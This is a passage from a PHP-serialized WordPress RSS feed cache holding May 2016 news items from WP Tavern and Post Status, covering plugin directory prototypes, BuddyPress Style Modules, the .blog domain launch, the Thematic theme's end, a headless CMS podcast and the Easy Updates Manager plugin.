href=\"https://make.wordpress.org/meta/2016/05/19/plugin-directory-prototypes/#comment-8151\">highlights the concern</a> that too much information has been stripped away.</p>\n<p>In response to a comment on the announcement post, Samuel Sidler, <span class=\"st\">Apollo Team Lead at Automattic and contributor to the Meta team</span>, <a href=\"https://make.wordpress.org/meta/2016/05/19/plugin-directory-prototypes/#comment-8154\">explains</a> why he doesn’t think the information is useful to users.</p>\n<blockquote><p>Author, as you said, is only really useful for insiders. The latter two, meanwhile, are already taken into account in the search results. If a plugin doesn’t have a recent compatible version, it will move down the list. If it’s too old, it won’t get shown at all (which is the case today).</p>\n<p>Active installs is more interesting, but we account for it weighting search results as-is. I actually find it refreshing to <em>not</em> show the active installs as it allows for less-popular plugins to get more downloads. Users will be less likely to click the popular plugins (outside of familiar names) and more likely to find the plugin they actually need.</p></blockquote>\n<p>Another commenter suggests <a href=\"https://profiles.wordpress.org/awakensolutions/\">creating a simple/advanced view. </a>By default, the page could display a simplistic design while giving power users an option for more details.</p>\n<p>“Just like <a href=\"https://wordpress.org/about/philosophy/\" rel=\"nofollow\">WordPress core</a>, we strive to design for the majority and build features for the 80%,” Sidler said in response to the comment. “An ‘advanced’ view doesn’t meet that requirement, in my eyes.”</p>\n<p>The Meta team is iterating quickly and will soon publish a prototype of the plugin details page. If you have feedback on the plugin homepage and search result prototypes, please leave a comment on <a href=\"https://make.wordpress.org/meta/2016/05/19/plugin-directory-prototypes/\">the announcement post</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 May 2016 20:19:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"WPTavern: WPWeekly Episode 235 – Interview with James Giroux Envato’s WordPress Evangelist\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=55000&preview_id=55000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/wpweekly-episode-235-interview-with-james-giroux-envatos-wordpress-evangelist\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1298:\"<p>In this episode, <a href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by <a href=\"https://jamesgiroux.ca/\">James Giroux</a>, Envato’s WordPress evangelist. We discuss a number of topics including what he’s accomplished since taking over the position in January, the item support policy change, and author driven pricing.</p>\n<p>We also find out what his favorite part of the job is and what he enjoys most about his role at Envato. Last but not least, we discover what the company is doing to shorten the length of time it takes to get through the review queue.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, June 1st 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #235:</strong><br />\n</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 May 2016 19:18:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: BuddyPress Launches Style Modules Trial Initiative\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54954\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/buddypress-launches-style-modules-trial-initiative\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3960:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/customize-posts.jpg\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/customize-posts.jpg?resize=1024%2C583\" alt=\"photo credit: Paintbrush - (license)\" class=\"size-full wp-image-54351\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/93249705@N03/13067171403\">Paintbrush</a> – <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">(license)</a>\n<p>BuddyPress core developer <a href=\"https://twitter.com/hnla\" target=\"_blank\">Hugo Ashmore</a> announced a new trial initiative this week that aims to create a library of CSS and JavaScript snippets to help users customize their communities. The <a href=\"https://bpdevel.wordpress.com/2016/05/11/buddypress-style-modules/\" target=\"_blank\">Style Modules</a> project will aggregate community-submitted code that enhances BuddyPress components in a plug-and-play manner.</p>\n<p>Developers who want to contribute to the project can submit their modules by creating a ticket on <a href=\"https://buddypress.trac.wordpress.org/newticket\" target=\"_blank\">BP trac</a> and attaching a zip file that includes the CSS/JS files, a readme.md, and a screenshot.</p>\n<p>Users who want to add a module will need to create a /style-modules/ directory and then unzip the module inside it. The next step requires the user to copy functions from the module’s readme file to their theme’s functions.php file, a step which provides a significant hurdle for a non-technical BuddyPress community manager.</p>\n<p>“Initially this is a trial to see whether we get sufficient interest in the concept to continue and develop further, perhaps enhancing the loading process with enqueueing of files based on directory scanning and loading of files as an array but run from the core theme compat class, removing the need for users to copy the loading functions to their functions file,” Ashmore said.</p>\n<p>The project’s GitHub repository includes <a href=\"https://github.com/buddypress/style-modules/wiki/Style-Modules-Listings\">an example module</a> that re-styles the members list into a grid layout. Other example ideas Ashmore suggested include a new look for profile entries, a different presentation for the activity posting form, or something as simple as changing the font size for the activity stream.</p>\n<p>The experimental initiative will test the waters to see if the BuddyPress community will chip in to provide enough modules to make this a real library. The support policy stated in the proposal doesn’t offer much incentive for module authors to submit their work:</p>\n<blockquote><p>Provision of modules and use of them is entirely the discretion of the authors and users, while BP will run some basic checks on the module BP does not guarantee that the modules will work in all given situations or installs, or accept any liability in their use. Support for a module remains the responsibility of the author to ensure the continued effectiveness of the module with updates to themes, WP or BP.</p></blockquote>\n<p>Historically, BuddyPress has struggled to present itself as an easily customizable solution for communities. <a href=\"http://codex.buddypress.org/themes/theme-compatibility-1-7/a-quick-look-at-1-7-theme-compatibility/\" target=\"_blank\">Theme compatibility</a>, introduced in April 2013, made it easier to use BP with any theme, but unless you purchase a theme specifically designed for the plugin, its default output is rather generic and in need of heavy styling.</p>\n<p>The <a href=\"https://bpdevel.wordpress.com/2016/05/11/buddypress-style-modules/\" target=\"_blank\">BuddyPress Style Modules</a> concept is an attempt to make it easier for community managers to enhance BP components with different looks, but the project will need to provide a compelling reason for developers to contribute modules and continue to maintain them.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 May 2016 02:34:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: The .blog Domain Extension Is Now Open to Registrars\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54971\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/the-blog-domain-extension-is-now-open-to-registrars\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2083:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/blogging.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/blogging.jpg?resize=960%2C521\" alt=\"photo credit: Luis Llerena\" class=\"size-full wp-image-54799\" /></a>photo credit: <a href=\"https://stocksnap.io/photo/3ZHG0XOIT6\">Luis Llerena</a>\n<p>Today marks a moment in internet history, as the very first .blog domain is now operational on WordPress.com. Knock Knock, WHOIS There, a subsidiary of Automattic, launched <a href=\"https://nic.blog/\" target=\"_blank\">Nic.blog</a> today to begin getting registrars to sign up to sell the new TLD.</p>\n<p>Automattic <a href=\"http://wptavern.com/automattic-to-oversee-the-sale-and-registration-of-top-level-blog-domains\" target=\"_blank\">won the rights to oversee the sale and registration of the .blog domain</a> in 2015 via a bidding process that is estimated to have closed around $20 million. The domain extension is so new that Twitter doesn’t yet support it as a valid link, but Automattic expects to activate 250,000 new names in 2016.</p>\n<p>According to the new nic.blog information site, registrars that sign up to sell .blog domains will be able to participate in an incentive partnership model that rewards a higher volume of sales:</p>\n<blockquote><p>Pricing will be in the standard range for new gTLDs, with premium names available in several tiers. High margins for registrars will be guaranteed by an incentive model, rewarding sales above a certain baseline. Final terms will be published in the coming weeks.</p></blockquote>\n<p>Automattic is opening up the .blog TLD to registrars around the world and companies can sign up on nic.blog to learn more about the requirements. Individuals who are interested in purchasing a .blog domain should review the tentative <a href=\"https://nic.blog/launch-plan/\" target=\"_blank\">launch plan</a> published today. Registration will be open to trademark owners during the Sunrise period starting in August 2016, followed by a Landrush period in October.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 May 2016 23:26:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: After Eight Years, Thematic Theme’s Lead Developers Discontinue the Project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54967\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/after-eight-years-thematic-themes-lead-developers-discontinue-the-project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3812:\"<p>Gene Robinson, lead developer of the Thematic WordPress theme, has <a href=\"http://thematictheme.com/2016/05/15/thematic-retrospective/\">announced</a> that the project will no longer be developed. Thematic <a href=\"https://wordpress.org/themes/thematic/\">was last updated</a> in 2013 and is actively installed on more than 4K sites. Users are advised to migrate to a different theme as updates will no longer be released. As WordPress core evolves, sites using Thematic may develop incompatibilities.</p>\n<h2>Continuing The Legacy with a Different Name</h2>\n<p>Although development on Thematic is discontinuing, Robinson has forked the project and renamed it to <a href=\"http://d.eciduo.us\">Deciduous. </a>The project picks up where Thematic leaves off. Those interested in continuing development can <a href=\"https://github.com/emhr/Deciduous\">follow it on GitHub</a> where pull requests are welcomed. Robinson is also seeking links to other projects that are derivative of Thematic.</p>\n<h2>Where to Get Support for Thematic</h2>\n<p>Users who need support are advised to post on the <a href=\"https://wordpress.org/support/theme/thematic\">WordPress.org support forums</a> for the Thematic theme, “The support forums on the Thematic website are shutting down due to the lack of community involvement, moderation, and developer feedback,” Robinson said. “Hopefully the greater WordPress support community will be able to help you find a resolution.”</p>\n<h2>A Look Back</h2>\n<p>The years 2008-2009 is an interesting time frame in WordPress’ history. A number of commercial theme and plugin companies, WordPress-centric sites, and projects were launched. Among these was the <a href=\"https://web.archive.org/web/20080611165821/http://themeshaper.com/thematic-for-wordpress/\">Thematic theme</a> by Ian Stewart, theme Wrangler for Automattic. Thematic was more than just a theme, it was an opportunity for Stewart to learn how WordPress’ theme system works.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/ThematicThemePreview.png\"><img class=\"size-full wp-image-54981\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/ThematicThemePreview.png?resize=951%2C740\" alt=\"Thematic Theme Preview from WordPress.org\" /></a>Preview of Thematic from WordPress.org\n<p>He regularly shared his knowledge with the community through <a href=\"https://themeshaper.com/\">ThemeShaper.com</a>, a site now owned by Automattic that features contributions from other members of the theme team. It was the wild west of theme development in 2008 and any person who regularly shared theme development techniques became an influential member of the community.</p>\n<p>Two years after launching Thematic, Stewart <a href=\"https://themeshaper.com/2010/03/04/ian-stewart-joined-automattic/\">joined Automattic</a> as a theme wrangler.</p>\n<blockquote><p>What can I say besides awesome, awesome, awesome? The enormous opportunity for learning and improvement; all the super-talented, friendly people; the chance to work on so many really, really cool projects—it’s almost unbelievable. This is a dream job for me.</p></blockquote>\n<p>The hiring allowed him to make available all of his commercial child themes built on the Thematic framework available free of charge to the community.</p>\n<h2>Did You Learn From Thematic?</h2>\n<p>It’s bittersweet and slightly nostalgic to see the theme come to an end. When I launched the Tavern in 2009, I regularly linked to tutorials and articles published by Stewart. I’m almost certain Thematic and its creator helped out a number of budding theme developers between 2008-2011. Let us know in the comments if you used Thematic for any projects or what you learned from its code.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 May 2016 20:45:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Post Status: WordPress as a Headless CMS — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=24518\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://poststatus.com/wordpress-headless-cms-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2870:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard.</p>\n<p><span>Joe and Brian discuss WordPress as a Headless CMS. They talk about what a Headless CMS is, WordPress’s strengths and weaknesses as a Headless CMS, popular frameworks to utilize, and offer up example websites to check out.</span></p>\n<p><a href=\"https://audio.simplecast.com/37861.mp3\">https://audio.simplecast.com/37861.mp3</a><br />\n<a href=\"http://audio.simplecast.com/37861.mp3\">Direct Download</a></p>\n<h3>Examples</h3>\n<ul>\n<li><a href=\"https://www.guggenheim.org/\">The Guggenheim</a></li>\n<li><a href=\"https://adayofrest.hm/boston-2016/\">A Day of Rest Boston</a></li>\n<li><a href=\"https://ustwo.com/\">ustwo</a></li>\n<li><a href=\"http://skaled.com/\">Skaled</a></li>\n<li><a href=\"http://tri.be/\">Modern Tribe</a></li>\n</ul>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://angularjs.org/\">Angular</a></li>\n<li><a href=\"https://facebook.github.io/react/\">React</a></li>\n<li><a href=\"http://blog.scalac.io/2016/02/16/react-vs-angular-2.html\">React vs Angular 2</a></li>\n<li><a href=\"https://getmoxied.net/lean/\">Lean, an Agular for WordPress framework</a></li>\n<li><a href=\"https://pantheon.io/decoupled-cms\">Decoupled CMS</a></li>\n<li><a href=\"https://css-tricks.com/what-is-a-headless-cms/\">What is a Headless CMS?</a></li>\n<li><a href=\"http://petya.in/we-need-to-talk-about-the-rest-api-the-non-developer-guide-to-the-future-of-wordpress/\">We Need to Talk about the REST API</a></li>\n<li><a href=\"https://make.wordpress.org/core/2016/05/16/rest-api-authentication-broker/\">Introducing the REST API Authentication Broker</a></li>\n<li><a href=\"https://hmn.md/2016/01/14/introducing-our-wordpress-rest-api-white-paper/\">Human Made’s REST API White Paper</a></li>\n</ul>\n<h3>Sponsor</h3>\n<p><span>Today’s show is sponsored by </span><a href=\"http://optinmonster.com\"><span>OptinMonster</span></a><span>. OptinMonster allows you to convert visitors into subscribers. You can easily create & A/B test beautiful lead capture forms without a developer. They recently released </span><a href=\"http://optinmonster.com/introducing-optinmonster-3-0-taking-your-conversion-optimization-to-the-next-level/\"><span>OptinMonster 3.0</span></a><span>, with an all new builder interface and other great features.</span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 May 2016 17:47:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: Take Granular Control of WordPress’ Update System with Easy Updates Manager\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54952\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/take-granular-control-of-wordpress-update-system-with-easy-updates-manager\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3933:\"<p>When <a href=\"https://wordpress.org/news/2013/10/basie/\">WordPress 3.7 “Basie”</a> was released in 2013, it brought automatic updates to the masses. By default, WordPress automatically updates to point releases. Using <a href=\"https://codex.wordpress.org/Configuring_Automatic_Background_Updates\">additional constants</a> within wp-config.php, you can configure WordPress to automatically update themes, plugins, and major releases.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerFeaturedImage.png\"><img class=\"aligncenter size-full wp-image-54958\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerFeaturedImage.png?resize=650%2C207\" alt=\"Easy Update Manager Featured Image\" /></a></p>\n<p>If you want granular control over the WordPress update system without touching code, check out <a href=\"https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/\">Easy Updates Manager</a>. Easy Updates Manager is a free plugin that’s active on more than 70k sites. It’s maintained by <a href=\"https://profiles.wordpress.org/kidsguide/\">Matthew</a>, <a href=\"https://profiles.wordpress.org/ronalfy/\">Ronald Huereca</a>, <a href=\"https://profiles.wordpress.org/roary86/\">Roary Tubbs</a>, and <a href=\"https://profiles.wordpress.org/bigwing/\">BigWing Interactive</a>.</p>\n<h2>Countless Number of Configurations Available</h2>\n<p>Once activated, you’ll find the options page by browsing to Dashboard > Update Options. There are two different interfaces for configuring updates. The first includes a number of toggle switches that disable/enable updates. The second is a traditional screen with radial buttons.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerDashboard.png\"><img class=\"size-full wp-image-54959\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerDashboard.png?resize=1025%2C432\" alt=\"Easy Update Manager Dashboard\" /></a>Easy Updates Manager Dashboard\n<p>Traditional settings page for Easy Updates Manager.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerGeneralSettings.png\"><img class=\"size-full wp-image-54960\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerGeneralSettings.png?resize=566%2C480\" alt=\"Easy Update Manager General Settings\" /></a>Easy Updates Manager General Settings\n<p>One of the highlights of Easy Updates Manager is the ability to enable automatic updates for individual themes and plugins. It’s a convenient way to update themes and plugins that rarely cause issues. There’s also a built-in logging feature that when enabled creates a new table in the database. It logs the username, update type, version, action, status, and date.</p>\n<p>Logging is listed as a beta feature and should be used at your own risk. It also may not work with all commercial themes and plugins. Here’s what the log looks like after I updated three plugins.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerLogs.png\"><img class=\"size-full wp-image-54961\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/EasyUpdateManagerLogs.png?resize=1025%2C350\" alt=\"Easy Update Management Log\" /></a>Easy Updates Management Log\n<p>Easy Updates Manager also includes the ability to exclude users from manipulating the plugin’s settings. The plugin contains additional features that I encourage you to explore by using it on a test site.</p>\n<p>Thanks to the number of options available, users have a countless number of update configurations to choose from. I tested the plugin on WordPress 4.6 alpha and it works as expected. You can <a href=\"https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/\">download it for free</a> from the WordPress plugin directory.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 May 2016 07:17:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: WordPress 4.6 Improves the Accessibility of the Tag and Category Management 